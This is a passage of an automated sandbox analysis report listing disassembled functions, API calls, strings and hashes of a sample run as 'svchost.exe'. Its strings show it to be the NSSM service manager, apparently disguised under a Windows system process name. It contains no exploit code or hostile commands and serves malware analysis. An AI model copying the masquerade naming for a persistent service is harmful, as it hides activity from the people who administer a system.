Part of subcall function 00415E45: ___free_lconv_num.LIBCMT ref: 00415EAC
Part of subcall function 00415E45: ___free_lc_time.LIBCMT ref: 00415F31

Strings

x/B, xrefs: 004160DE

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: x/B
API String ID: 467427115-795736107
Opcode ID: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
Instruction ID: b34a0f9879d2699f7ffcf6201956a3b00b8b15cae77dc86b8d387886a1ceb3e8
Opcode Fuzzy Hash: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
Instruction Fuzzy Hash: C7E04F33B019315B8A36AE1D64406EB9A948FCA715F1B41AFF844A7784DF2CCCC154AD

Function 004098D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 004098D0

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498

Strings

2014-08-31, xrefs: 004098D6
32-bit, xrefs: 004098DB
2.24, xrefs: 004098E0

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ConsoleFreeLocalWindow_vfwprintf
String ID: 2.24$2014-08-31$32-bit
API String ID: 1334155653-2354707097
Opcode ID: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
Instruction ID: c76862b1d953f522f71d38d82470cec42d68d54e25fb047d8ef406d997cf9da4
Opcode Fuzzy Hash: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
Instruction Fuzzy Hash: 01D0C2F0A8460137E600AA598C07F8B22409B8470DFC4006AB606A52D2D67CF8944A5D

Function 0041A8B3 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041A8E7
__isleadbyte_l.LIBCMT ref: 0041A91B
MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,?,00000000,00000000,?,?,?,?,00412F07), ref: 0041A94C
MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,00000001,00000000,00000000,?,?,?,?,00412F07), ref: 0041A9BA

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
Instruction ID: 8e80b7d0e863ddd762db141ba23fd8d99fbbd19addded7427a642c387e288d34
Opcode Fuzzy Hash: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
Instruction Fuzzy Hash: 54311370A12245EFDB20EF64C884AFE3BA4BF01310F1589AAE4619B291D334DDE1DB56

Function 0040D7E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

get_service_username(), xrefs: 0040D85E
username, xrefs: 0040D863

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: get_service_username()$username
API String ID: 0-1118073074
Opcode ID: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
Instruction ID: 7d16268e7706c02599106e4441dc23a9752c8f6b5ec33a58098762b0a8250c8b
Opcode Fuzzy Hash: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
Instruction Fuzzy Hash: DE1106B6A003015BE710EFA9EC85B9773A8EF84304F048476F91CDB381E379E8588768

Function 00405080 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 004050E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004050F1
HeapFree.KERNEL32(00000000), ref: 004050F8
SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 00405106

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: EnvironmentHeapVariable$FreeProcess
String ID:
API String ID: 1651283563-0
Opcode ID: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
Instruction ID: 7ca8f0decbef4ebefa15ff84fd483d82a394ef1ad15d6eda22774f96b67548aa
Opcode Fuzzy Hash: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
Instruction Fuzzy Hash: 26117F71C047169AD730AF549C0575BB3F8EF94310F54883BE989A72C1F3B898D48B9A

Function 00404EE0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000), ref: 00404F26
HeapAlloc.KERNEL32(00000000), ref: 00404F2D

Strings

copy_environment_block(), xrefs: 00404F3A
environment, xrefs: 00404F3F

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: copy_environment_block()$environment
API String ID: 1617791916-2686971372
Opcode ID: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
Instruction ID: 8deebacdc600d522f7aab138bb3d98dce45cd337f056f7d9729cf224169f9fdd
Opcode Fuzzy Hash: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
Instruction Fuzzy Hash: 1A01FCF66046221AD6212618BC50BF72298DFD0769B11443BFA82E71C5EA78CC8141A8

Function 00401469 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 0040147C
GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 00401491
LsaFreeMemory.ADVAPI32(00000000), ref: 004014F1
LsaFreeMemory.ADVAPI32(00000000), ref: 004014FB

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: AuthorityFreeMemory
String ID:
API String ID: 1444650384-0
Opcode ID: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
Instruction ID: 83e81ec0094bd32f467672ea939adaeb78c7e9f3249d369c250e79b353d34dd7
Opcode Fuzzy Hash: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
Instruction Fuzzy Hash: 81110675A043406FC310EB61C88596BB7E5FF89318F40093DF98997361D638DD91CB99

Function 00405680 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00405699
GetDesktopWindow.USER32 ref: 0040569F
GetWindowRect.USER32(00000000,?), ref: 004056AF
MoveWindow.USER32(?,?,?,00000000,?,00000000), ref: 004056E6

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Window$Rect$DesktopMove
String ID:
API String ID: 2894293738-0
Opcode ID: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
Instruction ID: 4404551d088f54b3b346c67006461702cb67daa45ea7307cd0df8ea8ccbf729a
Opcode Fuzzy Hash: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
Instruction Fuzzy Hash: D5014FB1604212ABD704CE7CDD44EAFBBEDEBC8640F48492DB854D3284DB34E8058BA6

Function 00408870 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000002,?,?,?,?,00000000), ref: 0040888F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004088A2
SetEndOfFile.KERNEL32(00000000), ref: 004088AE
GetLastError.KERNEL32(00000000), ref: 004088BB

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: File$CreateErrorLastPointer
String ID:
API String ID: 2723331319-0
Opcode ID: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
Instruction ID: 5390559d92aa947b9314eb53a18356e94adec141a5a2c230ab48a642764cfde5
Opcode Fuzzy Hash: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
Instruction Fuzzy Hash: DBF0C8B66046107FE2109758AC0AF9F7768DFC4B24F50C539FA05E62D1D774DC4186BA

Function 00405870 Relevance: 6.0, APIs: 4, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000), ref: 0040587D
SendMessageW.USER32(00000000,?,0000000E,00000000), ref: 00405884
GetDlgItemTextW.USER32(00000000), ref: 00405898

Part of subcall function 004054A0: MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4

_memset.LIBCMT ref: 004058BF

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ItemMessage$SendText_memset
String ID:
API String ID: 106090685-0
Opcode ID: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
Instruction ID: cb56df8b7445a31a75e8c4718e41db6c747a4df5fb1419ea8052b39527e82588
Opcode Fuzzy Hash: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
Instruction Fuzzy Hash: A2F0A7B17003007BE120AB61DC8DF573B6CDF44B45F40441D7904D61D1D67CE900CE29

Function 0040D950 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

service, xrefs: 0040D971
alloc_nssm_service(), xrefs: 0040D96C

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$HeapSource$AllocDeregisterProcessRegisterReport
String ID: alloc_nssm_service()$service
API String ID: 1868725766-2157636798
Opcode ID: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
Instruction ID: 2c9525e28b5191ed34799dbcc002321da452954f880f3acf974e46df2d9dfe00
Opcode Fuzzy Hash: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
Instruction Fuzzy Hash: FAD05EF5E8062027D61222A87C0AFDB25089750B56F528A71BE18F62C2D5A8884046AC

Function 004067C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

GetDlgItemTextW.USER32(?,000003ED,00000002,00000100), ref: 004067EA

Strings

remove(), xrefs: 0040683A
service, xrefs: 0040683F

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ItemText
String ID: remove()$service
API String ID: 3367045223-1317115628
Opcode ID: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
Instruction ID: 8184d59d72f0fbf905fa053582e3628f82c79463e423cb7eee217312d63cbccc
Opcode Fuzzy Hash: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
Instruction Fuzzy Hash: B021DEB3A4451032E112319DBC82FEF9258CB9076DF84803BF208F91C6E73D5A91419E

Function 00408750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040877C

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

%s%s, xrefs: 0040876E
set_createfile_parameter(), xrefs: 0040878A

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: %s%s$set_createfile_parameter()
API String ID: 2445375048-102671490
Opcode ID: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
Instruction ID: 3394c9dda24fa343ec2156a0d0e2bb01f682d842124ecdf63034fec8dba4f21e
Opcode Fuzzy Hash: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
Instruction Fuzzy Hash: 9701B1B26142002BD300A7598C42FAFB3E8ABC4314F80041EF515972C1F5B8A59587D7

Function 00401720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

LocalSystem, xrefs: 00401726

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: LocalSystem
API String ID: 0-3718507506
Opcode ID: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
Instruction ID: 9109e31f7caa357bacc1ff475e9021cac7f2486fa8cfe9e055bed6058de38d4d
Opcode Fuzzy Hash: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
Instruction Fuzzy Hash: BFF0B477B001206BDA105A55AC00BDBA3AC9B847A7F14003FF901E31E1E77C994282E9

Analysis Process: svchost.exePID: 7340, Parent PID: 624COMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 00409B70 Relevance: 40.6, APIs: 8, Strings: 15, Instructions: 334
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401A00: GetConsoleWindow.KERNEL32 ref: 00401A01
Part of subcall function 00401A00: GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
Part of subcall function 00401A00: GetCurrentProcessId.KERNEL32 ref: 00401A1A
Part of subcall function 00401A00: FreeConsole.KERNEL32 ref: 00401A25

__fileno.LIBCMT ref: 00409B86
__setmode.LIBCMT ref: 00409B8F
__fileno.LIBCMT ref: 00409BA5
__setmode.LIBCMT ref: 00409BAE

Part of subcall function 00413A6D: ___lock_fhandle.LIBCMT ref: 00413B12
Part of subcall function 00413A6D: __setmode_nolock.LIBCMT ref: 00413B2A

Part of subcall function 00409920: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
Part of subcall function 00409920: CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
Part of subcall function 00409920: FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989

Part of subcall function 00413919: _doexit.LIBCMT ref: 00413925

TlsAlloc.KERNEL32(00000000), ref: 00409EB0
GetStdHandle.KERNEL32(000000F6), ref: 00409ECB
StartServiceCtrlDispatcherW.ADVAPI32 ref: 00409EF4
GetLastError.KERNEL32 ref: 00409EFE

Part of subcall function 004099A0: _memset.LIBCMT ref: 004099BD
Part of subcall function 004099A0: GetProcessHeap.KERNEL32 ref: 004099E2
Part of subcall function 004099A0: HeapAlloc.KERNEL32(00000000), ref: 004099EB

Strings

status, xrefs: 00409CD8
NSSM, xrefs: 00409EDC
unset, xrefs: 00409DD2
start, xrefs: 00409BE6
pause, xrefs: 00409C80
install, xrefs: 00409D33
rotate, xrefs: 00409D04
continue, xrefs: 00409CAC
remove, xrefs: 00409DE6
set, xrefs: 00409DAA
stop, xrefs: 00409C12
restart, xrefs: 00409C3E
get, xrefs: 00409D92
reset, xrefs: 00409DBE
edit, xrefs: 00409D7A

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Process$AllocConsoleFreeHeapWindow__fileno__setmode$AllocateCheckCtrlCurrentDispatcherErrorHandleInitializeLastMembershipServiceStartThreadToken___lock_fhandle__setmode_nolock_doexit_memset
String ID: NSSM$continue$edit$get$install$pause$remove$reset$restart$rotate$set$start$status$stop$unset
API String ID: 4221750250-1322290842
Opcode ID: 185ff8e273914152f489ed86a642b69f32b9ea0c6012e47610038ecc76eefd94
Instruction ID: 8d0ce95e1571a4db95220a4f6881cac6d3a3a374ab3f9564aeafd07009bbe4f6
Opcode Fuzzy Hash: 185ff8e273914152f489ed86a642b69f32b9ea0c6012e47610038ecc76eefd94
Instruction Fuzzy Hash: D691A1F1E5030166DA10BA72AC46B5B325D4F6031EF14093FB845B22C7FA7DEE9485AE

Function 00401B20 Relevance: 1096.9, APIs: 622, Strings: 2, Instructions: 4907
windowmemoryserviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocConsole.KERNELBASE ref: 00401B50
GetConsoleWindow.KERNELBASE ref: 00401B56
GetSystemMenu.USER32(00000000,00000000), ref: 00401B5F
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00401B6D

Part of subcall function 0040CA70: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C

GetServiceDisplayNameW.ADVAPI32(00000000,?,?,?), ref: 00401B9A
_memset.LIBCMT ref: 00401BAF
CloseServiceHandle.ADVAPI32(00000000), ref: 00401BB8
__snwprintf_s.LIBCMT ref: 00401BDB
__snwprintf_s.LIBCMT ref: 00401C01
SetConsoleTitleW.KERNELBASE(?), ref: 00401C11
GetStdHandle.KERNEL32(000000F5), ref: 00401C1F
FillConsoleOutputAttribute.KERNELBASE(00000000,00000000,00000050,?,?), ref: 00401C45
FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,00000050,?,?), ref: 00401C58
GetStdHandle.KERNEL32(000000F5), ref: 00401C5C
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401C80
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401C91
GetStdHandle.KERNEL32(000000F5), ref: 00401C95
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401CB9
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401CCA
GetStdHandle.KERNEL32(000000F5), ref: 00401CCE
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401CF2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401D03
GetStdHandle.KERNEL32(000000F5), ref: 00401D07
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401D2B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401D3C
GetStdHandle.KERNEL32(000000F5), ref: 00401D40
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000005,?,?), ref: 00401D67
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 00401D78
GetStdHandle.KERNEL32(000000F5), ref: 00401D7C
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00401DA2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00401DB3
GetStdHandle.KERNEL32(000000F5), ref: 00401DB7
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00401DDD
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00401DEE
GetStdHandle.KERNEL32(000000F5), ref: 00401DF2
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00401E19
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00401E2A
GetStdHandle.KERNEL32(000000F5), ref: 00401E2E
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 00401E58
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 00401E69
GetStdHandle.KERNEL32(000000F5), ref: 00401E6D
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 00401E96
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00401EA7
GetStdHandle.KERNEL32(000000F5), ref: 00401EAB
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00401ED5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00401EE6
GetStdHandle.KERNEL32(000000F5), ref: 00401EEA
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00401F14
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00401F25
GetStdHandle.KERNEL32(000000F5), ref: 00401F29
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00401F53
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00401F64
